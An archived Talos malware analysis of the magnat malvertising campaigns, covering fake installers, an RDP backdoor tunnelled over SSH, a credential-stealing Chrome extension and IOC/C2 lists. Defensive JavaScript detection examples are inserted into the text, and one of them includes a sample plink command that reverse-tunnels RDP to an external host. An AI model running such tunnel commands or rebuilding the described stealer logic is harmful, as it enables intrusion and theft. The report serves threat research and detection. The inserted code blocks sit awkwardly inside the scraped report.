{
	"id": "01679875-be16-41f4-b07f-eb49cdd938f4",
	"created_at": "2026-04-06T01:31:06.260066Z",
	"updated_at": "2026-04-10T03:20:31.153881Z",
	"deleted_at": null,
	"sha1_hash": "84b5cc7e827f2dba7a877290d4bf60858303a3d4",
	"title": "Magnat campaigns use malvertising to deliver information stealer, backdoor and malicious Chrome extension",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4116886,
	"plain_text": "Magnat campaigns use malvertising to deliver information stealer,\r\nbackdoor and malicious Chrome extension\r\nBy Tiago Pereira\r\nPublished: 2021-12-02 · Archived: 2026-04-06 00:56:11 UTC\r\nThursday, December 2, 2021 07:48\r\nBy Tiago Pereira.\r\nTalos recently observed a malicious campaign offering fake installers of popular software as bait to get\r\nusers to execute malware on their systems.\r\nThis campaign includes a set of malware distribution campaigns that started in late 2018 and have targeted\r\nmainly Canada, along with the U.S., Australia and some EU countries.\r\nTwo undocumented malware families (a backdoor and a Google Chrome extension) are consistently\r\ndelivered together in these campaigns.\r\nAn unknown actor with the alias \"magnat\" is the likely author of these new families and has been\r\nconstantly developing and improving them.\r\nThe attacker's motivations appear to be financial gain from selling stolen credentials, fraudulent\r\ntransactions and Remote Desktop access to systems.\r\nIntroduction\r\nTalos recently observed a malware distribution campaign that tries to trick users\r\ninto executing fake software installers of popular software on their systems. We\r\nbelieve with moderate confidence that online advertising is used to reach potential\r\nhttps://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html\r\nPage 1 of 23\n\nvictims that are searching for software to install on their systems. 
The combination\r\nof advertising and fake software installers is particularly tricky, as the users\r\nreached by the ads are already predisposed to execute an installer on their systems.\r\nOnce the fake installers run, they execute three pieces of malware on the victim's system:\r\nA password stealer that collects all the credentials available on the system.\r\nA \"backdoor\" that sets up remote access via a stealth Microsoft Remote Desktop session by forwarding the\r\nRDP port through an SSH tunnel, allowing access to systems even when behind a firewall.\r\nA malicious browser extension that contains several information-stealing features, such as keylogging and\r\ntaking screenshots.\r\nPassword stealers have long presented a risk to individuals and to companies. The compromised accounts are\r\nfrequently sold in underground forums and may lead to additional compromise using the stolen accounts and\r\nthrough password reuse. The Chrome extension adds to this risk by allowing the theft of credentials used on the\r\nweb that may not be stored on the system. Additionally, the use of an SSH tunnel to forward RDP to an external\r\nserver provides attackers with a reliable way to log in remotely to a system, bypassing firewall controls.\r\nThe campaigns\r\nThe attack begins when a victim looks for a particular piece of software for\r\ndownload. Talos believes the attacker has set up an advertising campaign that\r\npresents links to a web page offering the download of a software installer. The\r\ninstaller has many different file names. 
For example: viber-25164.exe, wechat-35355.exe, build_9.716-6032.exe, setup_164335.exe, nox_setup_55606.exe and\r\nbattlefieldsetup_76522.exe.\r\nWhen executed, this installer does not install the software it announces, but instead executes a malicious\r\nloader on the system.\r\nThe installer/loader is a 7-Zip SFX archive or a Nullsoft installer that decodes and drops a legitimate AutoIt\r\ninterpreter and three obfuscated AutoIt scripts that decode the final payloads in memory and inject them into the\r\nmemory of another process.\r\nThe final payloads are almost always the same three specific pieces of malware:\r\nA commodity password stealer, initially Azorult and currently Redline. Both steal all the credentials they can\r\nfind on the system. These password stealers are widely known and documented, and we will not analyse them\r\nfurther in this post.\r\nA backdoor, or backdoor installer, that we are calling \"MagnatBackdoor,\" that configures the system for\r\nstealthy RDP access, adds a new user and sets a scheduled task to periodically ping the C2 and, when\r\ninstructed, create an outbound SSH tunnel forwarding the RDP service.\r\nAn installer for a Chrome extension that we are calling \"MagnatExtension,\" which packs several features\r\nuseful for stealing data from the web browser: a form grabber, keylogger, screenshotter, cookie stealer and\r\narbitrary JavaScript executor, among others.\r\nCampaign timeline\r\nBased on our telemetry and on build dates of analyzed samples, we built a timeline that helps us\r\nunderstand the actor's activities.\r\nOur telemetry is focused only on MagnatBackdoor activity and shows that MagnatBackdoor was being\r\ndistributed from the end of 2019 through early 2020. 
From that moment on, we had little to no visibility of MagnatBackdoor\r\nuntil April 2021, when the activity seems to have restarted.\r\nThe telemetry data aligns with the build dates of the samples we found through OSINT. We found almost no\r\nsamples built between February and October 2020. However, we found samples built in late 2020 and early 2021\r\nfor which we had no visibility in the telemetry. There are several possible reasons for this; most likely, these\r\nwere used in test or smaller-scale campaigns.\r\nWe also found several interesting pieces of information:\r\nThe oldest MagnatExtension sample we found was dated August 2018. From that date until late 2019, we\r\nfound several samples that delivered the extension and the Azorult stealer.\r\nThe oldest MagnatBackdoor sample we found is from October 2019. From that moment on, all samples we\r\nfound contain the trio MagnatBackdoor/MagnatExtension/Azorult.\r\nIn February 2020, just before the large activity gap, Azorult stopped being part of the trio. This\r\nwas possibly a consequence of the release of Chrome 80, whose change to the browser's credential storage is known\r\nto have broken several malware families.\r\nWe found a small number of samples built in February 2020 that include Vidar Stealer and Gozi, suggesting that\r\nthe attacker may have been testing Azorult replacements.\r\nIn October 2020 the actor started testing Redline Stealer, creating some samples using Redline configured\r\nwith the ID \"testing\".\r\nThe campaigns that followed used the Redline / MagnatBackdoor / MagnatExtension trio. 
Interestingly,\r\nthese campaigns contain Redline IDs that allude to advertising campaigns (e.g., ads, ads3, ads5, ads6,\r\nads7, ads8, eumix3, eumix4).\r\nWe are not sure whether the use of malvertising started in October 2020, after the Redline introduction, with the \"ads\" bot ID.\r\nHowever, we believe with moderate confidence (the evidence suggests it, but we have not seen the actual ads)\r\nthat malvertising is a delivery method used by the author.\r\nWe started suspecting malvertising after analysing a few compromised systems. The malicious installer had\r\nbeen downloaded using Google Chrome, and there was no local email client open. The browser had communicated\r\nonly with Cloudflare and Google IPs at the moment of the download and, in one case, a few seconds prior to the\r\ndownload the browser had visited a software review website.\r\nThese behaviours are not conclusive and can be explained by other reasons (e.g., blackhat SEO or a webmail\r\nlink). However, we later found the Redline botnet IDs (ads, ads3, ads5, etc.), which strengthened the malvertising\r\ntheory. 
Finally, we found a tweet from August 2021 by a security researcher mentioning an ongoing malvertising\r\ncampaign, posting screenshots of the ads and sharing one of the downloaded samples.\r\nAfter analyzing the sample referred to in this tweet, we verified that it is one of the samples that includes\r\nMagnatBackdoor, MagnatExtension and Redline (botnet: ads7).\r\nVictimology\r\nBecause we are looking at a trio of malware with activity since 2018 and multiple C2 addresses\r\nused in every month of activity, it's not easy to find a way to study the targets of these campaigns.\r\nHowever, the domain stataready[.]icu has been used as the MagnatExtension C2 since January\r\n2019 and it is still used today in the settings received from the C2 servers as the updated C2. It\r\naggregates the traffic from infected systems in several campaigns, providing a good overall\r\npicture of the infection distribution through passive DNS.\r\nPassive DNS shows us the frequency of DNS queries for the C2 address. By looking at the relative distribution of\r\nthe origin of these queries we can get a picture of the countries most affected by the malware.\r\nThe relatively focused distribution of this malware is consistent with the use of advertising as a distribution\r\nchannel. There is a clear focus on Canada (roughly 50 percent of the infections), followed by the U.S. and\r\nAustralia.\r\nThere are also several infections in Italy, Spain and Norway (Redline's ID \"eumix\" hinted at some interest in\r\nEuropean countries).\r\nMore than 50 percent of the infections are in Canada, which leads us to wonder if there is any more specific target\r\nin that country. 
However, there is no domain specified in the MagnatExtension settings that is specific to Canada,\r\nand neither MagnatBackdoor nor Redline stealer provides any hints.\r\nMalware analysis\r\nThe loader\r\nThe loader is a .exe or a .iso file pretending to be a software installer. When executed, it creates\r\nseveral files and executes a set of commands that ultimately lead to the execution of the final\r\nmalware payloads.\r\nWe have seen similar loaders, documented by other researchers, delivering other malware, and believe that the\r\nloader is not specific to these campaigns.\r\nThere are two loader types that, although different in the installer technology used, are very similar in the\r\ntechnique that obfuscates and executes the payloads. One loader is a 7-Zip SFX (self-extracting archive); the\r\nother is an NSI (Nullsoft Installer) file.\r\nOpening one of the 7-Zip SFX-based loaders with the 7Z SFX builder, we can see the commands that are set to be\r\nexecuted on extraction.\r\nIn this case, the loader uses certutil to decode three of the contained files (dera, sfera and bruto) into three files\r\nthat are very large and highly obfuscated AutoIt scripts. Finally, the file dos.com (a legitimate AutoIt interpreter)\r\nis used to execute each of the scripts.\r\nOn the NSI-based loader, opening the file with 7-Zip, we can see the contents of the archive. The $APPDATA\r\nfolder contains the files to be dropped and the $PLUGINSDIR contains NSI-specific files. Finally, the [NSIS].nsi\r\nfile contains the commands that will be executed.\r\nAs seen in the image above, copto.vsdm seems to be the only cmd file executed. 
Extracting this file from the\r\n$APPDATA folder and opening it reveals a set of commands that are similar in sequence to the ones in the 7-Zip\r\nfile.\r\nLike before, the script performs the same actions three times, with different files:\r\nFirst, a new file is created containing only the \"MZ\" chars.\r\nThen, findstr extracts only the relevant parts from a file filled with junk data and writes them to the file\r\nwith \"MZ.\" This action decodes and writes the legitimate AutoIt interpreter to the system.\r\nThen, a large AutoIt script is copied to a new file with a name of only one character.\r\nFinally, as before, the AutoIt interpreter is used to execute the AutoIt script.\r\nIn both cases, the created script contains the final payload and is very obfuscated. Once executed, it creates a new\r\nprocess (usually the AutoIt interpreter that started it) and injects the final payload into its memory, where it will be\r\nexecuted.\r\nMagnatBackdoor\r\nMagnatBackdoor is an AutoIt-based installer that prepares a system for remote Microsoft Remote\r\nDesktop access and forwards the RDP service port through an outbound SSH tunnel. As a result of this\r\ninstaller's actions there is a way for the attacker to access the system remotely via RDP, which is\r\nwhy we call it a backdoor.\r\nThis malware applies this technique by setting up a scheduled task that periodically contacts a C2 server and sets\r\nup the tunnel if instructed by the C2 response. The following image summarizes the actions taken by the backdoor.\r\nAnalysing the malware sample, we find that it was built using AutoIt scripting and then transformed into an\r\nexecutable file. 
This process leaves several artifacts in the binary that provide useful information.\r\nThe previous image shows the result of the AutoIt extractor tool. It reveals:\r\nThe build path, including the username magnat. This is the same on all samples we found and it's the\r\nreason we call it MagnatBackdoor and, by extension, the magnat campaigns.\r\nThe build path also includes a string \"\\rdp\\new\\\" that reveals the malware version (\"new\") and a string\r\n\"vago2\" that we believe to be an organizational path, equivalent to a botnet \"group\" or \"id.\"\r\nThe time of file creation and last write. This date was key in building the campaign timeline.\r\nThe list of files packed within the executable.\r\nBased on the build path string, we found samples containing the following versions: \"rdp/rdp,\" \"rdp/3.5,\"\r\n\"rdp/3.6\" and \"rdp/new.\" The changes between versions seemed to be mostly bug fixes and improvements, such as\r\nadding some obfuscation to the network protocol. We will focus on the version \"new\" as it is built upon all\r\nprevious versions.\r\nThe main AutoIt script contains all the code and logic needed to install the files we observed in the file list into the\r\nfile system and to execute several scripts. The final objective is to have a set of scheduled tasks (STs) configured\r\non the system that ensure persistence and that connect to the C2 requesting a command for execution. The\r\nfollowing schema shows the key sections of the main installer code.\r\nAll the scripts starting with PERFORMSCRIPT are very similar. 
They receive as parameters a set of file paths and\r\nvariables, create a scheduled task XML descriptor by invoking one of the create_xml files and then register the\r\nscheduled task using the schtasks.exe command with the generated XML.\r\nThree scripts are registered as scheduled tasks. Running them as scheduled tasks adds some resiliency to\r\nthe malware. For example, if the added user is removed, it will be re-added after some time.\r\nThe first of the scheduled files is add_user.js. This script is responsible for creating a new user, assigning the\r\nappropriate permissions and groups and finally configuring the Windows Firewall to allow RDP communication.\r\nThe second scheduled script is obf_pinger_part2.vbs. This script uses some very simplistic obfuscation and is\r\nmostly responsible for installing RDPWrapper. RDPWrapper is an open-source tool that makes very useful\r\nimprovements to RDP. From the project's GitHub:\r\nThe third and last scheduled script is checkFscr.vbs. The checkFscr.vbs script has two main responsibilities:\r\ninstalling plink.exe (an SSH command line tool for Windows) and requesting a command from the C2 server, as\r\nshown in the following image.\r\nThe function receives an obfuscated string containing the username, password and pinger_id on the first line of\r\nthe snippet. It then builds a string that includes the C2 domain declared in line 2, information about the OS, the\r\nsystem user, the pinger file version and the received string, and performs an HTTP GET request to the C2 server,\r\nsending all this information in the query string.\r\nIf the server responds with an HTTP status code of 201, the response body is appended to the \"plink.exe\"\r\ncommand. 
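The check-in just described, reduced to two checks a responder can run. This is an added example, not Talos' or the malware's code: the proxy-log layout (time client method url status bytes), the query parameter names and the exact plink.exe flags the C2 returns are assumptions, and the sample lines are constructed. The two hostnames come from the IOC list at the end of the page.

```javascript
// Added example (not Talos' or the malware's code): two checks a responder can run
// against the MagnatBackdoor check-in. Assumptions, not from the page: the proxy-log
// layout (time client method url status bytes), the query parameter names, and the
// plink.exe flags the C2 sends back. Sample data is constructed.
const RDP_PORT = 3389;
// Two MagnatBackdoor C2 hosts from the IOC list, with the [.] defanging removed.
const KNOWN_C2 = new Set(['chocolatepuma.casa', 'wormbrainteam.club']);

// Find the scheduled-task check-ins: GET requests to the /api/ping path. A 201
// status is the signal that the body carried a command, so those are the lines
// to pull full captures for.
function findPingCheckins(lines) {
  const hits = [];
  for (const line of lines) {
    const f = line.trim().split(' ').filter(Boolean);
    if (f.length < 5 || f[2] !== 'GET') continue;
    let u;
    try { u = new URL(f[3]); } catch (e) { continue; }
    let path = u.pathname;
    while (path.length > 1 && path.endsWith('/')) path = path.slice(0, -1);
    if (path !== '/api/ping') continue;
    const status = Number(f[4]);
    hits.push({
      time: f[0],
      client: f[1],
      host: u.hostname,
      knownC2: KNOWN_C2.has(u.hostname),
      params: Array.from(u.searchParams.keys()),
      status,
      commandIssued: status === 201,
    });
  }
  return hits;
}

// Parse a plink.exe command line into the port forwards it requests.
// plink uses -R listen:host:port for remote (reverse) forwards and -L for local ones;
// returns null when the command is not plink or sets up no forward.
function parsePlinkCommand(cmdline) {
  const tokens = cmdline.trim().split(' ').filter(Boolean);
  if (tokens.length === 0 || !tokens[0].toLowerCase().endsWith('plink.exe')) return null;
  const result = { target: null, forwards: [] };
  const takesValue = new Set(['-pw', '-P', '-l', '-i', '-hostkey', '-m']);
  for (let i = 1; i < tokens.length; i++) {
    const t = tokens[i];
    if (t === '-R' || t === '-L') {
      const parts = (tokens[++i] || '').split(':');
      if (parts.length < 3) continue;
      result.forwards.push({
        direction: t === '-R' ? 'remote' : 'local',
        listen: parts.slice(0, -2).join(':'),
        host: parts[parts.length - 2],
        port: Number(parts[parts.length - 1]),
      });
    } else if (takesValue.has(t)) {
      i++; // skip the option value
    } else if (!t.startsWith('-')) {
      result.target = t; // user@host of the SSH server
    }
  }
  return result.forwards.length > 0 ? result : null;
}

// True when the command opens an outbound SSH session that publishes this host's
// RDP service on the remote side, which is what the page attributes to the backdoor.
function isRdpReverseTunnel(cmdline) {
  const parsed = parsePlinkCommand(cmdline);
  if (!parsed) return false;
  return parsed.forwards.some(f => f.direction === 'remote' && f.port === RDP_PORT);
}

// Constructed sample data (hostnames from the IOC list; addresses from documentation ranges).
const SAMPLE_LOG = [
  '2021-11-03T10:22:11Z 10.0.0.5 GET https://chocolatepuma.casa/api/ping?o=Windows10&u=jdoe&v=new&d=x 200 0',
  '2021-11-03T10:52:13Z 10.0.0.5 GET https://chocolatepuma.casa/api/ping?o=Windows10&u=jdoe&v=new&d=x 201 96',
  '2021-11-03T10:52:20Z 10.0.0.7 GET https://intranet.example/api/ping/ 200 12',
  '2021-11-03T10:53:00Z 10.0.0.7 GET https://intranet.example/index.html 200 5120',
];
const SAMPLE_PLINK = 'plink.exe -N -batch -pw hunter2 -P 22 -R 40011:127.0.0.1:3389 tunnel@203.0.113.10';
```

findPingCheckins pulls the /api/ping requests out of proxy logs and marks the 201 replies, which are the ones whose body became a plink command; isRdpReverseTunnel classifies a recovered command line (from the scheduled task, process-creation telemetry or the C2 body) as an RDP reverse tunnel. Unknown hosts hitting /api/ping are still returned so they can be checked against the IOC list rather than silently dropped.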
This allows the attacker to send a plink command that creates an SSH tunnel to a remote server,\r\nforwarding the local RDP port to be used for remote access.\r\nMagnatExtension\r\nWe also found a malicious Google Chrome extension delivered in all these campaigns. Because of\r\nits prevalence in samples that deliver MagnatBackdoor and because we have not seen it\r\nelsewhere, we call it MagnatExtension.\r\nMagnatExtension is delivered by an executable whose only function is to prepare the system and install the\r\nextension. Notice that this extension is installed by the malware itself and not from the Chrome Web Store.\r\nOnce installed, the extension is visible in the extensions settings as \"Google's Safe browsing.\"\r\nThe extension itself is made of three files: a manifest file, an icon and a background.js file that contains the\r\nmalicious code that runs in the background while the browser is running.\r\nThe extension code is obfuscated using several techniques, such as function redirects, encrypted substitution\r\narrays, function wrappers and string encoding.\r\nWe deobfuscated the JavaScript using a custom Python script. After deobfuscation, we analyzed the code to\r\nunderstand the extension's capabilities.\r\nFeatures\r\nThis extension is very similar in its features to a banking trojan. It periodically connects to a C2 to receive\r\nupdated configuration settings. 
Those settings are then used to control the behavior of the features that\r\nallow stealing data from the browser, such as a form grabber, keylogger and screenshotter, among others.\r\nThe following image summarizes the extension behavior and features.\r\nIn the extension code, at the end of the file, there is a code section where the extension sets up the event listeners\r\nshown in the previous image.\r\nGoing through each of the listeners is an effective way to cover most of the extension features:\r\nForm grabber: The extension listener captures the onBeforeRequest event whenever a web request is about to\r\nbe made. This allows it to look at the configuration and, if the current URL is in the \"form_URL_filter\" list,\r\nread the form using the window[\"requestBody\"][\"formData\"] property and send it to the C2 in a \"form\" action\r\nmessage type.\r\nHistory and scripts: When a browser tab is updated, the extension checks if the tab is loading a URL. If so, the\r\nextension sends a \"history\" request to the C2, which tells the C2 the URL the browser is loading. Finally, it\r\ncompares the tab URL with the URLs in the \"URL_mask\" field of each item in the \"script\" section of the config.\r\nIf there is a match, the code in the \"code\" field of the matching item is executed in the tab. This way, the extension\r\ncan completely replace the content of a page while leaving the address bar URL and the SSL icon untouched.\r\nKeylogger: When a browser tab is updated, the extension checks if the tab is loading a URL. If so, the extension\r\ncompares the tab URL with the URLs in the \"keylogger\" section of the config. 
If there is a match, the extension\r\nexecutes the keylogger code in the tab.\r\nThe keylogger code running in the tab captures all keys pressed by the user and then sends the log back to the\r\nextension code through a Chrome message, for which there is a listener set up.\r\nScreenshotter: When a browser tab is updated, the extension checks if the tab has completed loading a URL. If so,\r\nthe extension compares the tab URL with the URLs in the \"screenshoter\" section of the config. If there is a match,\r\nthe extension executes the chrome['tabs']['captureVisibleTab'] function to capture a screenshot and then sends it to\r\nthe C2 in a \"screenshoter\" type request.\r\nThe C2 communication happens as a result of one of the previously described features and at two additional\r\nmoments:\r\nPeriodic ping: The extension sets up an alarm that triggers every minute and sends a \"plugin\" type message to\r\nthe C2 server that contains the extension ID version. The server reply is a JSON string that contains the fields\r\ncookie and keylogger. If the cookie field is true, the extension collects and sends all cookies to the C2\r\nserver. The keylogger field switches a global boolean variable on or off. In earlier versions, this was used to\r\ndisable the keylogger, but it has been deactivated in the latest version.\r\nRequest settings: The extension sets up an alarm that triggers every 30 minutes and issues an HTTP GET\r\nrequest to the C2 server settings path without any additional data. If new settings are received, they are stored\r\nin the browser's local storage.\r\nBot settings\r\nAs previously mentioned, most features use the settings file to check whether a particular web page requires action\r\nor not. This setting is provided by the C2 server and stored locally. It has the following structure:\r\nThe settings have changed slightly over time. 
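As an added illustration, since the settings screenshots are not reproduced here: a constructed settings object using the field names the page reports (server, form_URL_filter, keylogger, screenshoter, script with URL_mask and code), with the listener logic from the Features section written out as plain functions so a recovered settings file can be evaluated against a URL. This is not the extension's code; the matching rule (case-insensitive substring on the full URL) and every sample value are assumptions.

```javascript
// Added example (not the extension's code): evaluate a MagnatExtension-style
// settings object against a tab URL and a pinger reply to see which features fire.
// Field names are those the page reports; the substring matching rule and the
// sample settings below are assumptions.
const SAMPLE_SETTINGS = {
  server: ['stataready.icu'],
  form_URL_filter: ['facebook.com/login'],
  keylogger: ['paypal.com'],
  screenshoter: ['paypal.com/myaccount', 'wallet.example/balance'],
  script: [{ URL_mask: 'bank.example/login', code: 'document.title = 1;' }],
};

function matchesMask(url, mask) {
  return url.toLowerCase().includes(String(mask).toLowerCase());
}
function matchesAny(url, masks) {
  return (masks || []).some(m => matchesMask(url, m));
}

// Actions raised from the tabs.onUpdated listener. status is loading or complete,
// the two tab states the page distinguishes: history, script injection and the
// keylogger fire while loading; the screenshot is taken once loading completes.
function actionsForTab(settings, url, status) {
  const actions = [];
  if (status === 'loading') {
    actions.push({ action: 'history', url });
    for (const item of settings.script || []) {
      if (matchesMask(url, item.URL_mask)) actions.push({ action: 'script', url, code: item.code });
    }
    if (matchesAny(url, settings.keylogger)) actions.push({ action: 'keylogger', url });
  }
  if (status === 'complete' && matchesAny(url, settings.screenshoter)) {
    actions.push({ action: 'screenshoter', url });
  }
  return actions;
}

// Action raised from the webRequest.onBeforeRequest listener: the form grabber
// only fires for URLs in form_URL_filter, and ships the posted form fields.
function actionsForRequest(settings, url, formData) {
  return matchesAny(url, settings.form_URL_filter) ? [{ action: 'form', url, formData }] : [];
}

// The one-minute ping reply: cookie true means dump all cookies; keylogger toggles
// a global flag that, per the page, the latest version no longer honours.
function handlePingReply(reply, state, honourKeyloggerFlag) {
  const actions = [];
  if (reply.cookie === true) actions.push({ action: 'cookie' });
  if (honourKeyloggerFlag && typeof reply.keylogger === 'boolean') state.keyloggerEnabled = reply.keylogger;
  return actions;
}
```

Feeding a recovered settings3.json and a list of the organisation's login URLs through actionsForTab and actionsForRequest gives a quick answer to which pages the operator was grabbing forms, keystrokes or screenshots from.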
However, the C2 servers are still the same and have been working\r\nfor around three years, so the old settings are still available.\r\nThe most recent version - settings3.json:\r\nEarlier version - settings2.json:\r\nFirst version - settings.json:\r\nThe first settings version (settings.json) does not contain a server field because it was not possible to update the C2 via\r\nthe settings file. settings2.json adds the server field, and the latest version (settings3.json) contains a form\r\ngrabber active for Facebook URLs. The screenshotter has been active since the first version for the same set of\r\nURLs. This suggests the attacker's motivation is to observe the balances of PayPal accounts and cryptocurrency\r\nwallets and, possibly, request the cookies of those systems.\r\nC2 communications\r\nThe C2 address is hardcoded in the sample, and it can be updated by the current C2 with a list of additional\r\nC2 addresses. Interestingly, although this is disabled in recent versions, when the server check fails the extension\r\ncan try to obtain a new C2 address from a Twitter hashtag search.\r\nThe following tweets show the hashtags we found in use:\r\nThe algorithm for getting the domain from the tweet is very simple: concatenate the first letter of each word.\r\nUsing the previous tweets as an example, the domains are: stataready.icu and bolshebolshezolota.club.\r\nOnce an active C2 is available, the data is sent in JSON format in the body of an HTTP POST request. This JSON\r\nstring is encrypted. In the next section we describe the encryption used. 
The following JSON message types\r\nexist:\r\nEach message type's \"action\" value matches one of the previously described features. Additionally, the \"plugin\"\r\naction is used for the periodic ping message type, and its reply contains only two fields, used to request the browser\r\ncookies and to disable the keylogger.\r\nThe settings request is different: an HTTP GET request to the settings path (settings.json, settings2.json or\r\nsettings3.json) without any extra data. The response is the configuration file as described in the previous section.\r\nCommunication encryption\r\nCommunication with the C2 is done via HTTP (over SSL/TLS in all the samples we saw) and cryptography is\r\nused to protect the message contents. In all communication to the C2, the HTTP body contains a JSON\r\nstring containing the encryption key encrypted with the server's public key, the AES-encrypted text, the\r\ninitialization vector and a salt.\r\nThe code used to encrypt the data is:\r\nThe communication from C2 to bot is unencrypted in the pinger replies, but the settings response contains a JSON\r\nwith encrypted data in the following format.\r\nThe key is not sent this time; it is hardcoded in the decryption function as follows.\r\nAfter some research we concluded that the encryption library and the JSON string formats used by the\r\nextension are based on the CryptoJS library, an open-source JavaScript cryptography library.\r\nConclusion\r\nThis research documents a set of malicious campaigns that have been going on for\r\naround three years, delivering a trio of malware, including two previously\r\nundocumented families (MagnatBackdoor and MagnatExtension). 
During this\r\ntime, these two families have been subject to constant development and\r\nimprovement by their authors; this is likely not the last we hear of them.\r\nWe believe these campaigns use malvertising as a means to reach users that are interested in keywords related to\r\nsoftware and present them with links to download popular software. This type of threat can be very effective and\r\nrequires that several layers of security controls are in place, such as endpoint protection, network filtering and\r\nsecurity awareness sessions.\r\nBased on the use of password stealers and a Chrome extension that is similar to a banking trojan, we assess that\r\nthe attacker's goals are to obtain user credentials, possibly for sale or for their own use in further exploitation. The\r\nmotive for the deployment of an RDP backdoor is unclear. The most likely are the sale of RDP access, the use of\r\nRDP to work around online service security features based on IP address or other endpoint-installed tools, or the\r\nuse of RDP for further exploitation on systems that appear interesting to the attacker.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. 
\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nCisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically\r\nand alerts users of potentially unwanted activity on every connected device.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on 
Snort.org.\r\nIOCs\r\nSamples:\r\n0cae9a4e0e73ff75f3ffa7f2d58ee67df34bc93e976609162cd6381ea9eb6f5b\r\nc997d6ca731762b6eb874296b8dea931095bb5d59f6e2195f02cfad246994a07\r\ncb40a5957081d6030e983bcc3e13122660236379858024cfda932117f8d6125f\r\n9b89464c0543e98d6a96ffaa34b78ef62e48182736482ddd968db17dc9e3076e\r\na3b5da275b97840a1e9e5f553d638bfb8e095102edd305008ca2875294b4deb1\r\nba7bb63b7cf08cfe48aead5ec65e81b35b89f4559d16257ba283f77251c15e32\r\nd06ea637979440edf76a679c0e8608e00dae877bfc10e642a4d9d509be2bb2a9\r\ned5abe5b0b9fb82a455ef0e750f44838e1272e743f079871161a2fa179b081f3\r\n1c602fc24a980135f9736d55986d694a4b542d69e6caa225d99c3e9e9c251a1a\r\n42178057b6914172e9101ddd265d88501e4518a92e854ad2ef6e8401d3bdbd15\r\n45b9894e4cac3c21f28308ee48a0095e9516f8b1c26483c1a58b47a9fbbe27e9\r\n0fde03bd190b9601983c97c4138c5953429a672530f585e53b5725b241c35cbb\r\nb6cf71093407d3548e25adc93ccc867602d5d5860753d480308a81273a483bee\r\n933ac399735239f00815637995c752757d867cc601b80274e62ef613c54cd510\r\n09158bf9c73f856f8a310ffa7238042d08d3a475ea34ffa6cee9e88d841c4a7e\r\nef44590fa6f19431c0b2182627f95b6b9568bd2700124bfc7abe4a979a363bb6\r\nc8864081450fbf75d2757716ef237e81c4f419c2e2a3e2deb86432e78412f109\r\nea3d8e8c07e87fab40fc0e30daea0307c1f0119c6b63a50759625a1edb777a58\r\n13ce97767c92b0f048b0cb4bf55ce8e928a77dc209c428b02de0a890f8f1ec13\r\nc7e703543814e6b70c0f1b2fe990f0251246dbe7931d7d7ee53b0e559d00e405\r\nf12649de9f93f6dc29a1c6838779885b733c95d4157f95bc92d3f81f52b41788\r\na70525f4aaf688588a65cb60fb18f9cc69b895d12da87cd39ba58f17db37d531\r\n28529e85f66ccfcc1b3ef43f37398cac1716f191775487a99bfe83a66554397a\r\n6ffc9bacb24ec4484a006dc3183984af2b7eaef0244fa5c0e96020081287ca62\r\n65784e672ccaa01697d47837ef036a06e180b394da60011374a7f4e8f3649492\r\nfbaa11e154c41b8b3e18e6db587d7c9f612ec7a1983aca8ec8a9dbb2322a3a9f\r\n7d22568c2d8f94852b59f5b01b12289419dc2e617c7977d2262e1061906d3fb3\r\n794833762b3a94a9b1e88ffb915352823b7192255aa7ac86bbe9f93a64395854\r\nc915342445a40722379bf91cf3ae3b846c6cd7bac069ad1040e2c22addbca1fd\r\n1109f4f612577ba61a8437309fd8bbd164d942090a10d490d6339f6ffb05f2cf\r\ndf3e587781523f2b9a2080caa9856d52b103302ebf311bbfeea54acb89f4b90d\r\ne2e66789c7f6627bfb270c609bae28cd9df7d369a5ba504dccc623eb11f9e3f2\r\n68aebb2f33f1475abc863495a1bf4a43de6fa267bedad1e64a037f60e3da707d\r\n41f9f0dd85b9d1860cbf707471572619218343e1113fa85158f7083d83fcaa0c\r\nac1df77c0d6d3c35da7571f49f0f66f144fbcfd442411585e48a82e2f61b1fc1\r\nC2s\r\nMagnatBackdoor:\r\nhttps://chocolatepuma[.]casa/api/ping\r\nhttps://wormbrainteam[.]club/api/ping\r\nhttps://430lodsfb[.]xyz/api/ping\r\nhttps://softstatistic[.]xyz/api/ping\r\nhttps://happyheadshot[.]club/api/ping\r\nhttps://aaabasick[.]fun/api/ping\r\nhttps://nnyearhappy[.]club/api/ping\r\nhttps://teambrainworm[.]club/api/ping\r\nhttps://yanevinovat[.]club/api/ping\r\nhttps://fartoviypapamojetvse[.]club/api/ping\r\nhttps://hugecarspro[.]space/api/ping\r\nhttps://burstyourbubble[.]icu/api/ping\r\nhttps://boogieboom[.]host/api/ping\r\nhttps://cgi-lineup[.]website/api/ping\r\nhttps://newdawnera[.]fun/api/ping/\r\nhttps://bhajhhsy6[.]site/api/ping/\r\nhttps://iisnbnd7723hj[.]digital/api/ping\r\nhttps://sdcdsujnd555w[.]digital/api/ping\r\nMagnatExtension:\r\nstataready[.]icu\r\nbolshebolshezolota[.]club\r\nluckydaddy[.]xyz\r\nadamantbarbellmethod[.]com\r\nRedline:\r\nuserauto[.]space\r\n22231jssdszs[.]fun\r\nhssubnsx[.]xyz\r\ndshdh377dsj[.]fun\r\nAzorult:\r\nhttp://0-800-email[.]com/index.php\r\nhttp://430lodsfb[.]club/index.php\r\nhttp://ifugonnag